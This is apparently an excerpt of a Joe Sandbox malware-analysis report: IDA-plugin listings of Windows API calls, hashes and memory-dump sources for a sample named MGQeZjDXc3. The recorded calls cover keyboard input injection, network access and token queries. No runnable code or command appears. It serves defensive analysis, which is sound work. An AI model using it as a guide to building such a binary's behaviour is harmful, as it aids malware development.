                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                • Opcode ID: 2e9fd7cba8e89176efac49a4c5b9a73be4c7acd545fb7f2fa8397581471cbe5b
                                                • Instruction ID: c90a9171e278d35393bd7b348e3da7873aeaea8198a785f8e81a8790f654d4d0
                                                • Opcode Fuzzy Hash: 2e9fd7cba8e89176efac49a4c5b9a73be4c7acd545fb7f2fa8397581471cbe5b
                                                • Instruction Fuzzy Hash: A2412A72A04298AEEF308B66C81DBFDBBB99F55310F04011AF5C1532C2C7B58E85D765
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B0B5D1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                • Opcode ID: f8c0feb0c92044f399ed9495c2e6105dcd386ecf0962f347d4b3d50104710c38
                                                • Instruction ID: 30f523c0f4944064d9030cab9c239d36eadff75c0d80b5e6973d9ae99fb11c5d
                                                • Opcode Fuzzy Hash: f8c0feb0c92044f399ed9495c2e6105dcd386ecf0962f347d4b3d50104710c38
                                                • Instruction Fuzzy Hash: A131DC34600208AFEF308F18CC99FA8BFE5EB16310F6485D5FA52D72E1CB31A9409B51
                                                APIs
                                                • ClientToScreen.USER32(?,?), ref: 00B0D807
                                                • GetWindowRect.USER32(?,?), ref: 00B0D87D
                                                • PtInRect.USER32(?,?,00B0ED5A), ref: 00B0D88D
                                                • MessageBeep.USER32(00000000), ref: 00B0D8FE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                • String ID:
                                                • API String ID: 1352109105-0
                                                • Opcode ID: a89e393203a9ad052198988743f69476ac0a0ee4b762c4ad14a917902bbfee84
                                                • Instruction ID: 06fa6c96c13837f9928d68c6efc2a2eca8936ec1b4ffb35f3d899e942ada4cb7
                                                • Opcode Fuzzy Hash: a89e393203a9ad052198988743f69476ac0a0ee4b762c4ad14a917902bbfee84
                                                • Instruction Fuzzy Hash: 64416374A00219EFCB21DF98D884AA9BBF5FB49350F1885E9E8159B2E0DB30E941CB50
                                                APIs
                                                • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00AE3AB8
                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00AE3AD4
                                                • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00AE3B34
                                                • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00AE3B92
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                • Opcode ID: fc2ea892829549396d65cdb7acf1556f09e90448439b38245c9f5ab061ca2a83
                                                • Instruction ID: 16717fb0880a60e1c0451cdc48519550067dc492da0b2962e3060f4e832814f9
                                                • Opcode Fuzzy Hash: fc2ea892829549396d65cdb7acf1556f09e90448439b38245c9f5ab061ca2a83
                                                • Instruction Fuzzy Hash: 9431F632A002D8AEEF319B66881DBFE7BB99B55310F04015AE483932D1C7B58F45D761
                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AD4038
                                                • __isleadbyte_l.LIBCMT ref: 00AD4066
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00AD4094
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00AD40CA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: 13280ec402e3e33168dfdeec1f9b0cc4e0744a4b6372760df5cc70b402db9f7e
                                                • Instruction ID: 85fffb1c2355d4a7f027a029109a056a7818cad747745f385526a0798840e59f
                                                • Opcode Fuzzy Hash: 13280ec402e3e33168dfdeec1f9b0cc4e0744a4b6372760df5cc70b402db9f7e
                                                • Instruction Fuzzy Hash: 4431F330600206EFDB21DF34C845BBA7BB5FF49310F15402AE6629B2A0E735D891DB90
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 00B07CB9
                                                  • Part of subcall function 00AE5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AE5F6F
                                                  • Part of subcall function 00AE5F55: GetCurrentThreadId.KERNEL32 ref: 00AE5F76
                                                  • Part of subcall function 00AE5F55: AttachThreadInput.USER32(00000000,?,00AE781F), ref: 00AE5F7D
                                                • GetCaretPos.USER32(?), ref: 00B07CCA
                                                • ClientToScreen.USER32(00000000,?), ref: 00B07D03
                                                • GetForegroundWindow.USER32 ref: 00B07D09
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                • String ID:
                                                • API String ID: 2759813231-0
                                                • Opcode ID: 4e31863891a9f7e1c8f5ebf8f4053133c9d988f3cd7dae8a747b7c49478354ad
                                                • Instruction ID: d62254b3bc28b54ecaa49b17a98ac55d40cfe72cc1ac8792f129e9959ace9442
                                                • Opcode Fuzzy Hash: 4e31863891a9f7e1c8f5ebf8f4053133c9d988f3cd7dae8a747b7c49478354ad
                                                • Instruction Fuzzy Hash: B431DF71D00108AFDB10EFB9D9859EFFBFDEF55314B10846AE815E7211DA35AE058BA0
                                                APIs
                                                  • Part of subcall function 00ABB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ABB35F
                                                • GetCursorPos.USER32(?), ref: 00B0F211
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B1E4C0,?,?,?,?,?), ref: 00B0F226
                                                • GetCursorPos.USER32(?), ref: 00B0F270
                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B1E4C0,?,?,?), ref: 00B0F2A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                • String ID:
                                                • API String ID: 2864067406-0
                                                • Opcode ID: 12f1f0d3c9b8c3fd667e71b39360433ea3931eb73cf6312cfa7b762ff526cf6d
                                                • Instruction ID: c77fd1ec2f8c028da2c66ac38976382e18d6daae153d7df2f05730316a542b3e
                                                • Opcode Fuzzy Hash: 12f1f0d3c9b8c3fd667e71b39360433ea3931eb73cf6312cfa7b762ff526cf6d
                                                • Instruction Fuzzy Hash: A5217E39600018FFCB258F98C858EFA7FB9EF09710F0844A9F9054B6E1DB749951DBA0
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00AF4358
                                                  • Part of subcall function 00AF43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00AF4401
                                                  • Part of subcall function 00AF43E2: InternetCloseHandle.WININET(00000000), ref: 00AF449E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Internet$CloseConnectHandleOpen
                                                • String ID:
                                                • API String ID: 1463438336-0
                                                • Opcode ID: ca34aaee048e6863f2a9ada546622aa3b0cbf434707fe8c7138b29571d0242bf
                                                • Instruction ID: 7f08a7cc121e0259673ae99ae59effbd35109c9201079ca49921f6814b6143e9
                                                • Opcode Fuzzy Hash: ca34aaee048e6863f2a9ada546622aa3b0cbf434707fe8c7138b29571d0242bf
                                                • Instruction Fuzzy Hash: 4F21A431204A09BFEB119FA0DC00FBBB7B9FF48710F10411ABB559B650DB71D821A790
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EC), ref: 00B08AA6
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B08AC0
                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B08ACE
                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B08ADC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$Long$AttributesLayered
                                                • String ID:
                                                • API String ID: 2169480361-0
                                                • Opcode ID: 332e275db506e4af71c7b1173c9f87dc156a1ca36e0116bd6e5419099a4db37e
                                                • Instruction ID: 924ffedf8bc719389789a9a19df0e6d9a3be4e3fd2261ce73a362f8c8cfbf59e
                                                • Opcode Fuzzy Hash: 332e275db506e4af71c7b1173c9f87dc156a1ca36e0116bd6e5419099a4db37e
                                                • Instruction Fuzzy Hash: B911AC31305510AFDB14AB18DD05FBA7BD9AF86320F14415AF866C72E2CF74AD018790
                                                APIs
                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00AF8AE0
                                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00AF8AF2
                                                • accept.WSOCK32(00000000,00000000,00000000), ref: 00AF8AFF
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00AF8B16
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ErrorLastacceptselect
                                                • String ID:
                                                • API String ID: 385091864-0
                                                • Opcode ID: c2389ef7db16fc9c5452d23bd9264d660fef0a2816808ab13a8a7cda00105bc8
                                                • Instruction ID: 2a2086a9fd1bf31e96f35b8282c79d00101e68b31e4df2fd21183d1532de2b12
                                                • Opcode Fuzzy Hash: c2389ef7db16fc9c5452d23bd9264d660fef0a2816808ab13a8a7cda00105bc8
                                                • Instruction Fuzzy Hash: FF216671A001249FC7219F69CD85AEE7BFCEF4A350F00416AF949D7291DB749D418F90
                                                APIs
                                                  • Part of subcall function 00AE1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00AE0ABB,?,?,?,00AE187A,00000000,000000EF,00000119,?,?), ref: 00AE1E77
                                                  • Part of subcall function 00AE1E68: lstrcpyW.KERNEL32(00000000,?,?,00AE0ABB,?,?,?,00AE187A,00000000,000000EF,00000119,?,?,00000000), ref: 00AE1E9D
                                                  • Part of subcall function 00AE1E68: lstrcmpiW.KERNEL32(00000000,?,00AE0ABB,?,?,?,00AE187A,00000000,000000EF,00000119,?,?), ref: 00AE1ECE
                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00AE187A,00000000,000000EF,00000119,?,?,00000000), ref: 00AE0AD4
                                                • lstrcpyW.KERNEL32(00000000,?,?,00AE187A,00000000,000000EF,00000119,?,?,00000000), ref: 00AE0AFA
                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,00AE187A,00000000,000000EF,00000119,?,?,00000000), ref: 00AE0B2E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: lstrcmpilstrcpylstrlen
                                                • String ID: cdecl
                                                • API String ID: 4031866154-3896280584
                                                • Opcode ID: ce2f4d236359629b89f4059c046692f41f7b99861fcf5957673c4238cd36875a
                                                • Instruction ID: 51cf2d5c408dbd8b40e7478fa369a5114f24f9e173e437f61124ec7841c14913
                                                • Opcode Fuzzy Hash: ce2f4d236359629b89f4059c046692f41f7b99861fcf5957673c4238cd36875a
                                                • Instruction Fuzzy Hash: 92119336200345AFDB25AF65DC45E7A77A9FF45354F80416AF806CB250EBB19891C7E0
                                                APIs
                                                • _free.LIBCMT ref: 00AD2FB5
                                                  • Part of subcall function 00AC395C: __FF_MSGBANNER.LIBCMT ref: 00AC3973
                                                  • Part of subcall function 00AC395C: __NMSG_WRITE.LIBCMT ref: 00AC397A
                                                  • Part of subcall function 00AC395C: RtlAllocateHeap.NTDLL(012F0000,00000000,00000001,00000001,00000000,?,?,00ABF507,?,0000000E), ref: 00AC399F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AllocateHeap_free
                                                • String ID:
                                                • API String ID: 614378929-0
                                                • Opcode ID: 074ce83eafd902737b3869c71c356df7c3622cacf394b6c8d0b8833a92e0d418
                                                • Instruction ID: 701f6281b17d5feaaf2518b34fe2dcf0b940e9e42d1a2207f0725d83ce16d4cd
                                                • Opcode Fuzzy Hash: 074ce83eafd902737b3869c71c356df7c3622cacf394b6c8d0b8833a92e0d418
                                                • Instruction Fuzzy Hash: CA11E333509212ABCF313B74AD44B6A3BA8AF54360F21492AF84B9A291DE34CD40DB91
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00AE05AC
                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00AE05C7
                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00AE05DD
                                                • FreeLibrary.KERNEL32(?), ref: 00AE0632
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                • String ID:
                                                • API String ID: 3137044355-0
                                                • Opcode ID: a8d0e661708732a24ae07c623138f31a8e01bff585a43019a3a769514b599f77
                                                • Instruction ID: 61c43039fd6d6c8999b6a539f62c3bb3c2d9d95b6ab74d8b1b148360ded7ef14
                                                • Opcode Fuzzy Hash: a8d0e661708732a24ae07c623138f31a8e01bff585a43019a3a769514b599f77
                                                • Instruction Fuzzy Hash: 7C213A71900299EFDB209F96DC88FDABBB8FF40704F008469E51696150EBF0EA95DF60
                                                APIs
                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AE6733
                                                • _memset.LIBCMT ref: 00AE6754
                                                • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00AE67A6
                                                • CloseHandle.KERNEL32(00000000), ref: 00AE67AF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CloseControlCreateDeviceFileHandle_memset
                                                • String ID:
                                                • API String ID: 1157408455-0
                                                • Opcode ID: d250e5db8252510d5187de715b0dd50b5ac307574ddb286e01bbf909cf6efc19
                                                • Instruction ID: 4fc76ecbbd0154161a530d245c7446424e57b28cd9da5c13c76f20939f584830
                                                • Opcode Fuzzy Hash: d250e5db8252510d5187de715b0dd50b5ac307574ddb286e01bbf909cf6efc19
                                                • Instruction Fuzzy Hash: FD110A71901228BAE7309BA5AC4DFABBABCEF44764F10459AF504E71C0D6704E808B65
                                                APIs
                                                  • Part of subcall function 00ADAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00ADAA79
                                                  • Part of subcall function 00ADAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00ADAA83
                                                  • Part of subcall function 00ADAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00ADAA92
                                                  • Part of subcall function 00ADAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00ADAA99
                                                  • Part of subcall function 00ADAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00ADAAAF
                                                • GetLengthSid.ADVAPI32(?,00000000,00ADADE4,?,?), ref: 00ADB21B
                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00ADB227
                                                • HeapAlloc.KERNEL32(00000000), ref: 00ADB22E
                                                • CopySid.ADVAPI32(?,00000000,?), ref: 00ADB247
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                • String ID:
                                                • API String ID: 4217664535-0
                                                • Opcode ID: 5f8820fb92a96fae2ff430a825eadb33d461441d14102bb375e1d89f725b230c
                                                • Instruction ID: ba468e2afe1bde3f1966f834d158ccb8843b06d61a8bfbfd14343a28bd62df98
                                                • Opcode Fuzzy Hash: 5f8820fb92a96fae2ff430a825eadb33d461441d14102bb375e1d89f725b230c
                                                • Instruction Fuzzy Hash: 6511BC72A10205EFCB14DF98CC85EAEB7A9EF85304B15842EE943A7320D731AE45CB20
                                                APIs
                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00ADB498
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ADB4AA
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ADB4C0
                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ADB4DB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 617907ebf21e651e83dde3d6261a0ad37d732faa09d97de57c320512cd483729
                                                • Instruction ID: c24dc357f6105072eaeba018d4dee3f37efc9df910bb1f285791d148bea054ea
                                                • Opcode Fuzzy Hash: 617907ebf21e651e83dde3d6261a0ad37d732faa09d97de57c320512cd483729
                                                • Instruction Fuzzy Hash: 31115E7A900218FFDB11DF98C981E9DBBB4FB08700F204091E605B7294D771AE11DBA4
                                                APIs
                                                  • Part of subcall function 00ABB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ABB35F
                                                • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00ABB5A5
                                                • GetClientRect.USER32(?,?), ref: 00B1E69A
                                                • GetCursorPos.USER32(?), ref: 00B1E6A4
                                                • ScreenToClient.USER32(?,?), ref: 00B1E6AF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
